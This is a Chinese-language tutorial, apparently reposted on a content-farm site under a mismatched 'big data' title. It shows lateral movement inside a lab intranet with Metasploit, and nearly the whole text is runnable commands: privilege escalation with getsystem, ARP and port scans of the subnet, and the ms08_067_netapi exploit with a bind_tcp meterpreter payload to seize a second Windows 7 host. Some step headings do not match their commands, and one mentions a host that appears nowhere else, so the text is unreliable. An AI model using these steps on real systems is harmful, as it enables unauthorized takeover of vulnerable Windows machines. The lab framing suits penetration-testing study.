千家信息网

大数据中如何获取内网中其他主机权限

发表于:2024-11-20 作者:千家信息网编辑
千家信息网最后更新 2024年11月20日,大数据中如何获取内网中其他主机权限,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。环境:小攻:Kali 2020,ip:192.168
千家信息网最后更新 2024年11月20日大数据中如何获取内网中其他主机权限

大数据中如何获取内网中其他主机权限,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。

环境:小攻:Kali 2020,ip:192.168.1.133

小受:win7 x86,ip:192.168.1.144

小小受:win7 x64 ,ip: 192.168.1.130

一、生成木马及监听主机参考上篇文章:

内网渗透 -- 提升权限(利用提权漏洞)

二、获取小受的IP地址

meterpreter > getsystem

三、获取内网中存活的主机,以一台win03主机为例

meterpreter > run post/windows/gather/arp_scanner rhosts=192.168.1.0/24

四、端口扫描,看看小小受开放了那些端口

1、选择用到的模块:

msf5 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp

2、查看需要配置的参数:

show options

3、设置要扫描的端口:

msf5 auxiliary(scanner/portscan/tcp) > set ports 80,135,445,3389,3306

4、设置小小受ip地址:

msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.1.130

5、执行:

msf5 auxiliary(scanner/portscan/tcp) > run

五、利用ms08_067漏洞拿下小小受

1、搜索ms08_067模块信息

msf5 auxiliary(scanner/portscan/tcp) > search ms08_067

2、选择该模块并设置payload

msf5 > use exploit/windows/smb/ms08_067_netapimsf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/bind_tcp

3、查看需要配置的参数:

msf5 exploit(windows/smb/ms08_067_netapi) > show options

4、设置目标主机并执行

msf5 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.1.130msf5 exploit(windows/smb/ms08_067_netapi) > run

关于大数据中如何获取内网中其他主机权限问题的解答就分享到这里了,希望以上内容可以对大家有一定的帮助,如果你还有很多疑惑没有解开,可以关注行业资讯频道了解更多相关知识。

0